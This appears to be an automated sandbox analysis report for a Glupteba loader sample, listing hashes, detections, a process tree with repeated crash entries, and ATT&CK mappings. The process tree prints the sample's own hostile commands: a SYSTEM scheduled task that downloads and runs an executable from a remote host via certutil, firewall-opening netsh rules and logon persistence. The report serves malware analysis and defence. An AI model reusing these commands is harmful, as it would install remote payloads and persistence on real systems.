glupteba | 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81

General

Target

6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
Size

3.8MB
MD5

3b5778d847bc929874d54362a181d583
SHA1

4618610eae30b16673c5bcbcab53bccfec7cff06
SHA256

6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81
SHA512

49f496b14b59f8a1de74e7bb3e464df881790bbb6e1a5c234a9b79a65336abf4ba1de6fdd3d3c71fb67b67c0abac7d657b47e90bcce960acf3962ed5fd7b03d3

Score

10^/10

glupteba dropper evasion loader

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4280-131-0x0000000005920000-0x0000000006016000-memory.dmp	family_glupteba
behavioral2/memory/4280-132-0x0000000000400000-0x00000000036BC000-memory.dmp	family_glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 3460 created 4280 3460 svchost.exe 6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

780 bcdedit.exe

description	pid	process	target process
PID 3460 created 4280	3460	svchost.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe

pid	process
780	bcdedit.exe

Program crash 56 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4792	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
4844	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
1888	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
1308	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
452	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
4660	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
2600	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
2360	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
3556	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
1924	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
4936	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
1532	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
2656	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
2920	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
3624	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
480	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
4284	4280	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
4348	3768	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
2372	3768	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
3144	3768	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
4328	3768	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
896	3768	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
1832	3768	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
1256	3768	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
4836	3768	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
3228	3768	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
4952	3768	WerFault.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
788	1964	WerFault.exe	csrss.exe
4780	1964	WerFault.exe	csrss.exe
2572	1964	WerFault.exe	csrss.exe
2220	1964	WerFault.exe	csrss.exe
4888	1964	WerFault.exe	csrss.exe
5024	1964	WerFault.exe	csrss.exe
4932	1964	WerFault.exe	csrss.exe
5108	1964	WerFault.exe	csrss.exe
1292	1964	WerFault.exe	csrss.exe
3952	1964	WerFault.exe	csrss.exe
3840	1964	WerFault.exe	csrss.exe
4804	1964	WerFault.exe	csrss.exe
3396	1964	WerFault.exe	csrss.exe
1216	1964	WerFault.exe	csrss.exe
4796	1964	WerFault.exe	csrss.exe
3180	1964	WerFault.exe	csrss.exe
2584	1964	WerFault.exe	csrss.exe
3556	1964	WerFault.exe	csrss.exe
1924	1964	WerFault.exe	csrss.exe
3744	1964	WerFault.exe	csrss.exe
2708	1964	WerFault.exe	csrss.exe
2764	1964	WerFault.exe	csrss.exe
3532	1964	WerFault.exe	csrss.exe
1104	1964	WerFault.exe	csrss.exe
1764	1964	WerFault.exe	csrss.exe
768	1964	WerFault.exe	csrss.exe
3228	1964	WerFault.exe	csrss.exe
2912	1964	WerFault.exe	csrss.exe
4400	1964	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4788 schtasks.exe
2040 schtasks.exe

pid	process
4788	schtasks.exe
2040	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe

pid	process
4280	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
4280	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	4280	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
Token: SeImpersonatePrivilege	4280	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
Token: SeTcbPrivilege	3460	svchost.exe
Token: SeTcbPrivilege	3460	svchost.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 3460 wrote to memory of 3768	3460	svchost.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
PID 3460 wrote to memory of 3768	3460	svchost.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
PID 3460 wrote to memory of 3768	3460	svchost.exe	6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe

C:\Users\Admin\AppData\Local\Temp\6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
"C:\Users\Admin\AppData\Local\Temp\6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 368
2⤵
- Program crash
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 388
2⤵
- Program crash
PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 384
2⤵
- Program crash
PID:1888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 608
2⤵
- Program crash
PID:1308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 708
2⤵
- Program crash
PID:452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 696
2⤵
- Program crash
PID:4660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 732
2⤵
- Program crash
PID:2600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 740
2⤵
- Program crash
PID:2360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 756
2⤵
- Program crash
PID:3556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 768
2⤵
- Program crash
PID:1924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 740
2⤵
- Program crash
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 748
2⤵
- Program crash
PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 848
2⤵
- Program crash
PID:2656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 660
2⤵
- Program crash
PID:2920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 820
2⤵
- Program crash
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 784
2⤵
- Program crash
PID:480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 936
2⤵
- Program crash
PID:4284

C:\Users\Admin\AppData\Local\Temp\6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe
"C:\Users\Admin\AppData\Local\Temp\6cbf5832d9bd10f2da84452a7d2bfcfb25e808c1ee558e90de27ce4f03adac81.exe"
2⤵
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 332
3⤵
- Program crash
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 332
3⤵
- Program crash
PID:2372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 584
3⤵
- Program crash
PID:3144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 684
3⤵
- Program crash
PID:4328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 708
3⤵
- Program crash
PID:896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 708
3⤵
- Program crash
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 672
3⤵
- Program crash
PID:1256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 324
3⤵
- Program crash
PID:4836

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:4892

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 708
3⤵
- Program crash
PID:3228

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23.exe" enable=yes"
3⤵
PID:820

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23.exe" enable=yes
4⤵
PID:1936

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 368
4⤵
- Program crash
PID:788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 404
4⤵
- Program crash
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 388
4⤵
- Program crash
PID:2572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 548
4⤵
- Program crash
PID:2220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 576
4⤵
- Program crash
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 488
4⤵
- Program crash
PID:5024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 488
4⤵
- Program crash
PID:4932

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:4788

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:2040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 840
4⤵
- Program crash
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 892
4⤵
- Program crash
PID:1292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 912
4⤵
- Program crash
PID:3952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 912
4⤵
- Program crash
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 928
4⤵
- Program crash
PID:4804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 964
4⤵
- Program crash
PID:3396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1028
4⤵
- Program crash
PID:1216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 924
4⤵
- Program crash
PID:4796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 600
4⤵
- Program crash
PID:3180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1108
4⤵
- Program crash
PID:2584

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:780

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1064
4⤵
- Program crash
PID:3556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 980
4⤵
- Program crash
PID:1924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1108
4⤵
- Program crash
PID:3744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 784
4⤵
- Program crash
PID:2708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1080
4⤵
- Program crash
PID:2764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 660
4⤵
- Program crash
PID:3532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1076
4⤵
- Program crash
PID:1104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1072
4⤵
- Program crash
PID:1764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 604
4⤵
- Program crash
PID:768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1144
4⤵
- Program crash
PID:3228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 876
4⤵
- Program crash
PID:2912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1248
4⤵
- Program crash
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 736
3⤵
- Program crash
PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4280 -ip 4280
1⤵
PID:3788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4280 -ip 4280
1⤵
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4280 -ip 4280
1⤵
PID:3396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4280 -ip 4280
1⤵
PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4280 -ip 4280
1⤵
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4280 -ip 4280
1⤵
PID:992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4280 -ip 4280
1⤵
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4280 -ip 4280
1⤵
PID:484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4280 -ip 4280
1⤵
PID:344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4280 -ip 4280
1⤵
PID:4192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4280 -ip 4280
1⤵
PID:1660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4280 -ip 4280
1⤵
PID:2708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4280 -ip 4280
1⤵
PID:1828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4280 -ip 4280
1⤵
PID:3696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4280 -ip 4280
1⤵
PID:2704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4280 -ip 4280
1⤵
PID:3240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4280 -ip 4280
1⤵
PID:3620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3768 -ip 3768
1⤵
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3768 -ip 3768
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3768 -ip 3768
1⤵
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3768 -ip 3768
1⤵
PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3768 -ip 3768
1⤵
PID:1420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3768 -ip 3768
1⤵
PID:1180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3768 -ip 3768
1⤵
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3768 -ip 3768
1⤵
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3768 -ip 3768
1⤵
PID:1560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3768 -ip 3768
1⤵
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1964 -ip 1964
1⤵
PID:3452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1964 -ip 1964
1⤵
PID:1684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1964 -ip 1964
1⤵
PID:2096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1964 -ip 1964
1⤵
PID:1088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1964 -ip 1964
1⤵
PID:4464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1964 -ip 1964
1⤵
PID:4504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1964 -ip 1964
1⤵
PID:4992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1964 -ip 1964
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1964 -ip 1964
1⤵
PID:536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1964 -ip 1964
1⤵
PID:3948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1964 -ip 1964
1⤵
PID:3336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1964 -ip 1964
1⤵
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1964 -ip 1964
1⤵
PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1964 -ip 1964
1⤵
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1964 -ip 1964
1⤵
PID:4172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1964 -ip 1964
1⤵
PID:2544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1964 -ip 1964
1⤵
PID:4956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1964 -ip 1964
1⤵
PID:116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1964 -ip 1964
1⤵
PID:344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1964 -ip 1964
1⤵
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1964 -ip 1964
1⤵
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 1964 -ip 1964
1⤵
PID:1908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1964 -ip 1964
1⤵
PID:2656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1964 -ip 1964
1⤵
PID:1648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 1964 -ip 1964
1⤵
PID:1432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1964 -ip 1964
1⤵
PID:4908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1964 -ip 1964
1⤵
PID:1560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1964 -ip 1964
1⤵
PID:3932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1964 -ip 1964
1⤵
PID:1092

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Download Submit
C:\Windows\rss\csrss.exe

Download Submit
C:\Windows\rss\csrss.exe

Download Submit
memory/544-148-0x0000000000000000-mapping.dmp

Download
memory/780-150-0x0000000000000000-mapping.dmp

Download
memory/820-138-0x0000000000000000-mapping.dmp

Download
memory/1936-139-0x0000000000000000-mapping.dmp

Download
memory/1964-145-0x0000000000400000-0x00000000036BC000-memory.dmp

Filesize
50.7MB

Download
memory/1964-140-0x0000000000000000-mapping.dmp

Download
memory/1964-144-0x0000000005C00000-0x00000000062F6000-memory.dmp

Filesize
7.0MB

Download
memory/1964-143-0x0000000005800000-0x0000000005BA7000-memory.dmp

Filesize
3.7MB

Download
memory/2040-147-0x0000000000000000-mapping.dmp

Download
memory/3768-134-0x0000000005308000-0x00000000056AF000-memory.dmp

Filesize
3.7MB

Download
memory/3768-135-0x0000000000400000-0x00000000036BC000-memory.dmp

Filesize
50.7MB

Download
memory/3768-133-0x0000000000000000-mapping.dmp

Download
memory/4280-130-0x000000000556C000-0x0000000005913000-memory.dmp

Filesize
3.7MB

Download
memory/4280-132-0x0000000000400000-0x00000000036BC000-memory.dmp

Filesize
50.7MB

Download
memory/4280-131-0x0000000005920000-0x0000000006016000-memory.dmp

Filesize
7.0MB

Download
memory/4400-137-0x0000000000000000-mapping.dmp

Download
